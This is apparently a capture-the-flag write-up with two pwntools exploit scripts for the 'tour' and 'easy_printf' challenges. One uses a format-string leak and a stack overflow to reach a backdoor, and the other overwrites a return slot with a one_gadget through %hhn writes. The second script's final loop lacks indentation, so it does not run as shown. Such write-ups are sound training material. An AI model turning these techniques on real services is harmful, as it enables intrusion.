tour
# Exploit script for the "tour" challenge, run locally against ./pwn (the
# remote target line is commented out). Two stages: a format-string read
# leaks a PIE address, then a stack overflow redirects control to a backdoor
# function. The primitive exists because user input reaches printf as the
# format string; a fixed format (printf("%s", buf)) removes it.
from pwn import *
from LibcSearcher import*  # imported but not used in this script
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
#p = remote('60.204.130.55', 10001)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
# Option '2' is sent before the format-string payload.
p.sendafter('Your choice :\n','2')
# Print stack argument 11 as a pointer; the trailing ',' delimits the leak.
payload1='%11$p,'
# Debugger attach left in; remove for an unattended run.
gdb.attach(p)
p.sendafter('Welcome to Terra_Cotta_Warriors\n',payload1)
# The leaked pointer is taken to sit 0x13a0 above the PIE base; 0x13a0 and
# 0x129a are offsets specific to this binary build.
pie_base=int(p.recvuntil(',',drop=True),16)-0x13a0
win=pie_base+0x129a  # backdoor function address
# Option '1' is sent before the overflowing input.
p.sendafter('Your choice :\n','1')
# 0x28 bytes of filler, then the backdoor address — presumably the filler
# reaches the saved return address; no canary handling is present.
payload2=b'a'*0x28+p64(win)
p.sendafter('Welcome to Huashan_Mountain\n',payload2)
p.interactive()
格式化字符串泄露pie,然后栈溢出改到后门。
easy_printf
格式化字符串,其他也没什么说的
# Exploit script for the "easy_printf" challenge, run locally against ./pwn
# (the remote target line is commented out). One format-string leak yields
# PIE, stack and libc addresses; repeated %hhn/%hn writes then place a
# one_gadget address on the stack one byte at a time. As with any format-string
# bug, a fixed format string (or -Wformat-security) removes the primitive.
from pwn import *
from LibcSearcher import*  # imported but not used in this script
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
#p = remote('60.204.130.55', 10001)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
#gdb.attach(p)
p.sendafter('Do you know who the best pwner is?\n',b'TokameinE_is_the_best_pwner\x00')
# Leak three stack arguments as comma-delimited pointers: arg 1 (a .bss
# address), arg 8 (a stack address) and arg 29 (a libc address).
payload1='%1$p,%8$p,%29$p,'
p.sendafter('What do you want to say?\n',payload1)
bss=int(p.recvuntil(',',drop=True),16)
print('bss=',hex(bss))
# 0x4060: offset of the leaked .bss slot from the PIE base (binary-specific).
pie_base=bss-0x4060
print('pie_base=',hex(pie_base))
stack=int(p.recvuntil(',',drop=True),16)
print('stack=',hex(stack))
# 0x20840: offset of the leaked libc pointer from the libc base
# (specific to the libc build the binary was patched against).
libc_base=int(p.recvuntil(',',drop=True),16)-0x20840
print('libc_base=',hex(libc_base))
#one_gadget=0xf1247
# Write target is stack+0x98; the value written there is libc_base+0xf1247
# (the one_gadget offset above). Both are split into single bytes for %hhn.
# NOTE(review): a, a+1 and a+2 are not masked again, so if the low byte of
# stack+0x98 is 0xfe or 0xff the later writes wrap past 0xff — confirm the
# stack alignment makes that impossible, or mask each value.
a=(stack+0x98)&0xff
b=(libc_base+0xf1247)&0xff
print(hex(a))
print(hex(b))
# Byte 0: %8$hhn stores `a` through the pointer held in arg 8.
# NOTE(review): the layout appears to be that arg 8 points at the stack slot
# read as arg 10, so this retargets the following %10$hhn write to
# stack+0x98 — verify in gdb, the offsets are not shown here.
payload2 ='%{}c%8$hhn\x00'.format(a).encode()
p.sendafter('What do you want to say?\n',payload2)
payload3='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload3)
# Byte 1: same pair of writes for stack+0x99 / bits 8..15 of the gadget.
b=((libc_base+0xf1247)>>8)&0xff
print(hex(b))
payload4 ='%{}c%8$hhn\x00'.format(a+1).encode()
p.sendafter('What do you want to say?\n',payload4)
payload5='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload5)
# Byte 2: stack+0x9a / bits 16..23. Only the three low bytes are written;
# presumably the existing value already has the correct upper bytes — TODO confirm.
# payload4/payload5 are rebound here; each is sent before being overwritten.
b=((libc_base+0xf1247)>>16)&0xff
print(hex(b))
payload4 ='%{}c%8$hhn\x00'.format(a+2).encode()
p.sendafter('What do you want to say?\n',payload4)
payload5='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload5)
# Final %hn writes the two low bytes of stack+0x90 through arg 8; what that
# slot is used for is not visible here (presumably repositioning the pointer
# before the exit path) — confirm against the binary.
a=(stack+0x90)&0xffff
print(hex(a))
payload6='%{}c%8$hn\x00'.format(a).encode()
p.sendafter('What do you want to say?\n',payload6)
# NOTE(review): the loop body below is not indented in this copy (likely lost
# on paste); as written it is a SyntaxError. `i` is unused.
for i in range(4):
p.sendafter('What do you want to say?\n',b'shell\x00')
# Debugger attach left in; remove for an unattended run.
gdb.attach(p)
p.sendafter('What do you want to say?\n','alice')
p.interactive()
一开始用的本机2.35版本的libc,栈环境有一点点不一样,exp烦了点。
最后发现因为2.35的onegadget限制有点多,就patch成比赛环境的libc了。
复现一下以前不会的赛题
结果随便一翻就是重量级(一眼出的那种)